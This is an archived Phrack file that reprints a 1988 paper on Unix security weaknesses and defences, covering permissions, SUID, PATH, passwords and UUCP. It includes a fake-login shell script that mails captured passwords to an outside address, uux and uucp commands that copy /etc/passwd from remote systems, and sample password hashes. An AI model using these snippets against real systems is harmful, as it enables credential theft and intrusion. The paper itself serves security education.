💾 Archived View for aphrack.org › issues › phrack18 › 7.gmi captured on 2021-12-03 at 14:04:38. Gemini links have been rewritten to link to archived content

View Raw

More Information

-=-=-=-=-=-=-

                               ==Phrack Inc.==

                     Volume Two, Issue 18, Phile #7 of 11

                   +--------------------------------------+
                   |     "Unix System Security Issues"    |
                   |              Typed by:               |
                   |               Whisky                 |
                   |         (from Holland, Europe)       |
                   +--------------------------------------+
                   |                 From                 |
                   |            Information Age           |
                   |     Vol. 11, Number 2, April 1988    |
                   |              Written By:             |
                   | Michael J. Knox and Edward D. Bowden |
                   +--------------------------------------+

Note:  This file was sent to me from a friend in Holland. I felt
       that it would be a good idea to present this file to the
       UNIX-hacker community, to show that hackers don't always
       harm systems, but sometimes look for ways to secure flaws
       in existing systems.  -- Jester Sluggo !!

There are a number of elements that have lead to the popularity of the Unix
operating system in the world today.  The most notable factors are its
portability among hardware platforms and the interactive programming
environment that it offers to users.  In fact, these elements have had much to
do with the successful evolution of the Unix system in the commercial market
place. (1, 2)
  As the Unix system expands further into industry and government, the need to
handle Unix system security will no doubt become imperative.  For example, the
US government is committing several million dollars a year for the Unix system
and its supported hardware.  (1) The security requirements for the government
are tremendous, and one can only guess at the future needs of security in
industry.
  In this paper, we will cover some of the more fundamental security risks in
the Unix system.  Discussed are common causes of Unix system compromise in
such areas as file protection, password security, networking and hacker
violations.  In our conclusion, we will comment upon ongoing effects in Unix
system security, and their direct influence on the portability of the Unix
operating system.

FILE AND DIRECTORY SECURITY

In the Unix operating system environment, files and directories are organized
in a tree structure with specific access modes.  The setting of these modes,
through permission bits (as octal digits), is the basis of Unix system
security.  Permission bits determine how users can access files and the type
of access they are allowed.  There are three user access modes for all Unix
system files and directories:  the owner, the group, and others.  Access to
read, write and execute within each of the usertypes is also controlled by
permission bits (Figure 1).  Flexibility in file security is convenient, but
it has been criticized as an area of system security compromise.


                        Permission modes
OWNER                        GROUP                    OTHERS
------------------------------------------------------------
rwx            :             rwx            :         rwx
------------------------------------------------------------
r=read  w=write  x=execute

-rw--w-r-x 1 bob csc532 70 Apr 23 20:10 file
drwx------ 2 sam A1 2 May 01 12:01 directory

FIGURE 1.  File and directory modes:  File shows Bob as the owner, with read
and write permission.  Group has write permission, while Others has read and
execute permission.  The directory gives a secure directory not readable,
writeable, or executable by Group and Others.


  Since the file protection mechanism is so important in the Unix operating
system, it stands to reason that the proper setting of permission bits is
required for overall security.  Aside from user ignorance, the most common
area of file compromise has to do with the default setting of permission bits
at file creation.  In some systems the default is octal 644, meaning that only
the file owner can write and read to a file, while all others can only read
it.  (3) In many "open" environments this may be acceptable.  However, in
cases where sensitive data is present, the access for reading by others should
be turned off. The file utility umask does in fact satisfy this requirement.
A suggested setting, umask 027, would enable all permission for the file
owner, disable write permission to the group, and disable permissions for all
others (octal 750).  By inserting this umask command in a user .profile or
.login file, the default will be overwritten by the new settings at file
creation.
  The CHMOD utility can be used to modify permission settings on files and
directories.  Issuing the following command,

chmod u+rwd,g+rw,g-w,u-rwx file

will provide the file with the same protection as the umask above (octal 750).
Permission bits can be relaxed with chmod at a later time, but at least
initially, the file structure can be made secure using a restrictive umask.
  By responsible application of such utilities as umask and chmod, users can
enhance file system security.  The Unix system, however, restricts the
security defined by the user to only owner, group and others.  Thus, the owner
of the file cannot designate file access to specific users.  As Kowack and
Healy have pointed out, "The granularity of control that (file security)
mechanisms is often insufficient in practice (...) it is not possible to grant
one user write protection to a directory while granting another read
permission to the same directory.  (4) A useful file security file security
extension to the Unix system might be Multics style access control lists.
  With access mode vulnerabilities in mind, users should pay close attention
to files and directories under their control, and correct permissions whenever
possible.  Even with the design limitations in mode granularity, following a
safe approach will ensure a more secure Unix system file structure.

SUID and SGID

The set user id (suid) and set group id (sgid) identify the user and group
ownership of a file.  By setting the suid or sgid permission bits of an
executable file, other users can gain access to the same resources (via the
executable file) as that of the real file's owner.

For Example:

Let Bob's program bob.x be an executable file accessible to others.  When Mary
executes bob.x, Mary becomes the new program owner.  If during program
execution bob.x requests access to file browse.txt, then Mary must have
previous read or write permission to browse.txt.  This would allow Mary and
everyone else total access to the contents of browse.txt, even when she is not
running bob.x.  By turning on the suid bit of bob.x, Mary will have the same
access permissions to browse.txt as does the program's real owner, but she
will only have access to browse.txt during the execution of bob.x.  Hence, by
incorporating suid or sgid, unwelcome browsers will be prevented from
accessing files like browse.txt.

  Although this feature appears to offer substantial access control to Unix
system files, it does have one critical drawback.  There is always the chance
that the superuser (system administrator) may have a writable file for others
that is also set with suid.  With some modification in the file's code (by a
hacker), an executable file like this would enable a user to become a
superuser.  Within a short period of time this violator could completely
compromise system security and make it inaccessible, even to other superusers.
As Farrow (5) puts it, "(...) having a set-user-id copy of the shell owned by
root is better than knowing the root password".
  To compensate for this security threat, writable suid files should be sought
out and eliminated by the system administrator.  Reporting of such files by
normal users is also essential in correcting existing security breaches.

DIRECTORIES

Directory protection is commonly overlooked component of file security in the
Unix system.  Many system administrators and users are unaware of the fact,
that "publicly writable directories provide the most opportunities for
compromising the Unix system security" (6). Administrators tend to make these
"open" for users to move around and access public files and utilities.  This
can be disastrous, since files and other subdirectories within writable
directories can be moved out and replaced with different versions, even if
contained files are unreadable or unwritable to others.  When this happens, an
unscrupulous user or a "password breaker" may supplant a Trojan horse of a
commonly used system utility (e.g. ls, su, mail and so on).  For example,
imagine

For example:

Imagine that the /bin directory is publicly writable.  The perpetrator could
first remove the old su version (with rm utility) and then include his own
fake su to read the password of users who execute this utility.

  Although writable directories can destroy system integrity, readable ones
can be just as damaging.  Sometimes files and directories are configured to
permit read access by other.  This subtle convenience can lead to unauthorized
disclosure of sensitive data:  a serious matter when valuable information is
lost to a business competitor.
  As a general rule, therefore, read and write access should be removed from
all but system administrative directories.  Execute permission will allow
access to needed files; however, users might explicitly name the file they
wish to use.  This adds some protection to unreadable and unwritable
directories.  So, programs like lp file.x in an unreadable directory /ddr will
print the contents of file.x, while ls/ddr would not list the contents of that
directory.

PATH VARIABLE

PATH is an environment variable that points to a list of directories, which
are searched when a file is requested by a process.  The order of that search
is indicated by the sequence of the listed directories in the PATH name.  This
variable is established at user logon and is set up in the users .profile of
.login file.
  If a user places the current directory as the first entry in PATH, then
programs in the current directory will be run first.  Programs in other
directories with the same name will be ignored.  Although file and directory
access is made easier with a PATH variable set up this way, it may expose the
user to pre-existing Trojan horses.
  To illustrate this, assume that a Trojan horse, similar to the cat utility,
contains an instruction that imparts access privileges to a perpetrator.  The
fake cat is placed in a public directory /usr/his where a user often works.
Now if the user has a PATH variable with the current directory first, and he
enters the cat command while in /usr/his, the fake cat in /usr/his would be
executed but not the system cat located in /bin.
  In order to prevent this kind of system violation, the PATH variable must be
correctly set.  First, if at all possible, exclude the current directory as
the first entry in the PATH variable and type the full path name when invoking
Unix system commands.  This enhances file security, but is more cumbersome to
work with.  Second, if the working directory must be included in the PATH
variable, then it should always be listed last.  In this way, utilities like
vi, cat, su and ls will be executed first from systems directories like /bin
and /usr/bin before searching the user's working directory.

PASSWORD SECURITY

User authentication in the Unix system is accomplished by personal passwords.
Though passwords offer an additional level of security beyond physical
constraints, they lend themselves to the greatest area of computer system
compromise.  Lack of user awareness and responsibility contributes largely to
this form of computer insecurity.  This is true of many computer facilities
where password identification, authentication and authorization are required
for the access of resources - and the Unix operating system is no exception.
  Password information in many time-sharing systems are kept in restricted
files that are not ordinarily readable by users.  The Unix system differs in
this respect, since it allows all users to have read access to the /etc/passwd
file (FIGURE 2) where encrypted passwords and other user information are
stored.  Although the Unix system implements a one-way encryption method, and
in most systems a modified version of the data encryption standard (DES),
password breaking methods are known. Among these methods, brute-force attacks
are generally the least effective, yet techniques involving the use of
heuristics (good guesses and knowledge about passwords) tend to be successful.
For example, the /etc/passwd file contains such useful information as the
login name and comments fields.  Login names are especially rewarding to the
"password breaker" since many users will use login variants for passwords
(backward spelling, the appending of a single digit etc.).  The comment field
often contains items such as surname, given name, address, telephone number,
project name and so on.  To quote Morris and Grampp (7) in their landmark
paper on Unix system security:

  [in the case of logins]

  The authors made a survey of several dozen local machines, using as trial
  passwords a collection of the 20 most common female first names, each
  followed by a single digit.  The total number of passwords tried was,
  therefore, 200.  At least one of these 200 passwords turned out to be a
  valid password on every machine surveyed.

  [as for comment fields]

  (...) if an intruder knows something about the people using a machine, a
  whole new set of candidates is available.  Family and friend's names, auto
  registration numbers, hobbies, and pets are particularly productive
  categories to try interactively in the unlikely event that a purely
  mechanical scan of the password file turns out to be disappointing.

Thus, given a persistent system violator, there is a strong evidence, that he
will find some information about users in the /etc/passwd file. With this in
mind, it is obvious that a password file should be unreadable to everyone
except those in charge of system administration.


root:aN2z06ISmxKqQ:0:10:(Boss1),656-35-0989:/:/bin
mike:9okduHy7sdLK8:09:122:No.992-3943:/usr:/bin

FIGURE 2.  The /etc/passwd file.  Note the comments field as underlined terms.


  Resolution of the /etc/passwd file's readability does not entirely solve the
basic problem with passwords.  Educating users and administrators is necessary
to assure proper password utilization. First, "good passwords are those that
are at least six characters long, aren't based on personal information, and
have some non-alphabetic (especially control) characters in them:  4score,
my_name, luv2run" (8).  Secondly, passwords should be changed periodically but
users should avoid alternating between two passwords.  Different passwords for
different machines and files will aid in protecting sensitive information.
Finally, passwords should never be available to unauthorized users. Reduction
of user ignorance about poor password choice will inevitably make a system
more secure.

NETWORK SECURITY

UUCP system
The most common Unix system network is the UUCP system, which is a group of
programs that perform the file transfers and command execution between remote
systems.  (3) The problem with the UUCP system is that users on the network
may access other users' files without access permission.  As stated by Nowitz
(9),

  The uucp system, left unrestricted, will let any outside user execute
  commands and copy in/out any file that is readable/writable by a uucp login
  user.  It is up to the individual sites to be aware of this, and apply the
  protections that they feel free are necessary.

This emphasizes the importance of proper implementation by the system
administrator.
  There are four UUCP system commands to consider when looking into network
security with the Unix system.  The first is uucp, a command used to copy
files between two Unix systems.  If uucp is not properly implemented by the
system administrator, any outside user can execute remote commands and copy
files from another login user.  If the file name on another system is known,
one could use the uucp command to copy files from that system to their system.
For example:

  %uucp system2!/main/src/hisfile myfile

will copy hisfile from system2 in the directory /main/src to the file myfile
in the current local directory.  If file transfer restrictions exist on either
system, hisfile would not be sent.  If there are no restrictions, any file
could be copied from a remote user - including the password file.  The
following would copy the remote system /etc/passwd file to the local file
thanks:

  %uucp system2!/etc/passwd thanks

System administrators can address the uucp matter by restricting uucp file
transfers to the directory /user/spool/uucppublic.  (8) If one tries to
transfer a file anywhere else, a message will be returned saying "remote
access to path/file denied" and no file transfer will occur.
  The second UUCP system command to consider is the uux.  Its function is to
execute commands on remote Unix computers.  This is called remote command
execution and is most often used to send mail between systems (mail executes
the uux command internally).
  The ability to execute a command on another system introduces a serious
security problem if remote command execution is not limited.  As an example, a
system should not allow users from another system to perform the following:

  %uux "system1!cat</etc/passwd>/usr/spool/uucppublic"

which would cause system1 to send its /etc/passwd file to the system2 uucp
public directory.  The user of system2 would now have access to the password
file.  Therefore, only a few commands should be allowed to execute remotely.
Often the only command allowed to run uux is rmail, the restricted mail
program.
  The third UUCP system function is the uucico (copy in / copy out) program.
It performs the true communication work.  Uucp or uux does not actually call
up other systems; instead they are queued and the uucico program initiates the
remote processes.  The uucico program uses the file /usr/uucp/USERFILE to
determine what files a remote system may send or receive.  Checks for legal
files are the basis for security in USERFILE.  Thus the system administrator
should carefully control this file.
  In addition, USERFILE controls security between two Unix systems by allowing
a call-back flag to be set.  Therefore, some degree of security can be
achieved by requiring a system to check if the remote system is legal before a
call-back occurs.
  The last UUCP function is the uuxqt.  It controls the remote command
execution.  The uuxqt program uses the file /usr/lib/uucp/L.cmd to determine
which commands will run in response to a remote execution request.  For
example, if one wishes to use the electronic mail feature, then the L.cmd file
will contain the line rmail.  Since uuxqt determines what commands will be
allowed to execute remotely, commands which may compromise system security
should not be included in L.cmd.

CALL THE UNIX SYSTEM

In addition to UUCP network commands, one should also be cautious of the cu
command (call the Unix system).  Cu permits a remote user to call another
computer system.  The problem with cu is that a user on a system with a weak
security can use cu to connect to a more secure system and then install a
Trojan horse on the stronger system.  It is apparent that cu should not be
used to go from a weaker system to a stronger one, and it is up to the system
administrator to ensure that this never occurs.

LOCAL AREA NETWORKS

With the increased number of computers operating under the Unix system, some
consideration must be given to local area networks (LANs).  Because LANs are
designed to transmit files between computers quickly, security has not been a
priority with many LANs, but there are secure LANs under development.  It is
the job of the system manager to investigate security risks when employing
LANs.

OTHER AREAS OF COMPROMISE

There are numerous methods used by hackers to gain entry into computer
systems.  In the Unix system, Trojan horses, spoofs and suids are the primary
weapons used by trespassers.
  Trojan horses are pieces of code or shell scripts which usually assume the
role of a common utility but when activated by an unsuspecting user performs
some unexpected task for the trespasser.  Among the many different Trojan
horses, it is the su masquerade that is the most dangerous to the Unix system.
  Recall that the /etc/passwd file is readable to others, and also contains
information about all users - even root users.  Consider what a hacker could
do if he were able to read this file and locate a root user with a writable
directory.  He might easily plant a fake su that would send the root password
back to the hacker.  A Trojan horse similar to this can often be avoided when
various security measures are followed, that is, an etc/passwd file with
limited read access, controlling writable directories, and the PATH variable
properly set.
  A spoof is basically a hoax that causes an unsuspecting victim to believe
that a masquerading computer function is actually a real system operation.  A
very popular spool in many computer systems is the terminal-login trap.  By
displaying a phoney login format, a hacker is able to capture the user's
password.
  Imagine that a root user has temporarily deserted his terminal.  A hacker
could quickly install a login process like the one described by Morris and
Grampp (7):

  echo -n "login:"
  read X
  stty -echo
  echo -n "password:"
  read Y
  echo ""
  stty echo
  echo %X%Y|mail outside|hacker&
  sleep 1
  echo Login incorrect
  stty 0>/dev/tty

We see that the password of the root user is mailed to the hacker who has
completely compromised the Unix system.  The fake terminal-login acts as if
the user has incorrectly entered the password.  It then transfers control over
to the stty process, thereby leaving no trace of its existence.
  Prevention of spoofs, like most security hazards, must begin with user
education.  But an immediate solution to security is sometimes needed before
education can be effected.  As for terminal-login spoofs, there are some
keyboard-locking programs that protect the login session while users are away
from their terminals.  (8, 10) These locked programs ignore keyboard-generated
interrupts and wait for the user to enter a password to resume the terminal
session.
  Since the suid mode has been previously examined in the password section, we
merely indicate some suid solutions here.  First, suid programs should be used
is there are no other alternatives.  Unrestrained suids or sgids can lead to
system compromise.  Second, a "restricted shell" should be given to a process
that escapes from a suid process to a child process.  The reason for this is
that a nonprivileged child process might inherit privileged files from its
parents.  Finally, suid files should be writable only by their owners,
otherwise others may have access to overwrite the file contents.
  It can be seen that by applying some basic security principles, a user can
avoid Trojan horses, spoofs and inappropriate suids.  There are several other
techniques used by hackers to compromise system security, but the use of good
judgement and user education may go far in preventing their occurrence.

CONCLUSION

Throughout this paper we have discussed conventional approaches to Unix system
security by way of practical file management, password protection, and
networking.  While it can be argued that user education is paramount in
maintaining Unix system security (11) factors in human error will promote some
degree of system insecurity.  Advances in protection mechanisms through
better-written software (12), centralized password control (13) and
identification devices may result in enhanced Unix system security.
  The question now asked applies to the future of Unix system operating.  Can
existing Unix systems accommodate the security requirements of government and
industry? It appears not, at least for governmental security projects.  By
following the Orange Book (14), a government graded classification of secure
computer systems, the Unix system is only as secure as the C1 criterion.  A C1
system, which has a low security rating (D being the lowest) provides only
discretionary security protection (DSP) against browsers or non-programmer
users. Clearly this is insufficient as far as defense or proprietary security
is concerned.  What is needed are fundamental changes to the Unix security
system.  This has been recognized by at least three companies, AT&T, Gould and
Honeywell (15, 16, 17).  Gould, in particular, has made vital changes to the
kernel and file system in order to produce a C2 rated Unix operating system.
To achieve this, however, they have had to sacrifice some of the portability
of the Unix system.  It is hoped that in the near future a Unix system with an
A1 classification will be realized, though not at the expense of losing its
valued portability.

REFERENCES

1  Grossman, G R "How secure is 'secure'?" Unix Review Vol 4 no 8 (1986)
   pp 50-63
2  Waite, M et al. "Unix system V primer" USA (1984)
3  Filipski, A and Hanko, J "Making Unix secure" Byte (April 1986) pp 113-128
4  Kowack, G and Healy, D "Can the holes be plugged?" Computerworld
   Vol 18 (26 September 1984) pp 27-28
5  Farrow, R "Security issues and strategies for users" Unix/World
   (April 1986) pp 65-71
6  Farrow, R "Security for superusers, or how to break the Unix system"
   Unix/World (May 1986) pp 65-70
7  Grampp, F T and Morris, R H "Unix operating system security" AT&T Bell
   Lab Tech. J. Vol 63 No 8 (1984) pp 1649-1672
8  Wood, P H and Kochan, S G "Unix system security" USA (1985)
9  Nowitz, D A "UUCP Implementation description:  Unix programmer's manual
   Sec. 2" AT&T Bell Laboratories, USA (1984)
10 Thomas, R "Securing your terminal: two approaches" Unix/World
   (April 1986) pp 73-76
11 Karpinski, D "Security round table (Part 1)" Unix Review
   (October 1984) p 48
12 Karpinski, D "Security round table (Part 2)" Unix Review
   (October 1984) p 48
13 Lobel, J "Foiling the system breakers:  computer security and access
   control" McGraw-Hill, USA (1986)
14 National Computer Security Center "Department of Defense trusted
   computer system evaluation criteria" CSC-STD-001-83, USA (1983)
15 Stewart, F "Implementing security under Unix" Systems&Software
   (February 1986)
16 Schaffer, M and Walsh, G "Lock/ix:  An implementation of Unix for the
   Lock TCB" Proceedings of USENIX (1988)
17 Chuck, F "AT&T System 5/MLS Product 14 Strategy" AT&T Bell Labs,
   Government System Division, USA (August 1987)
==============================================================================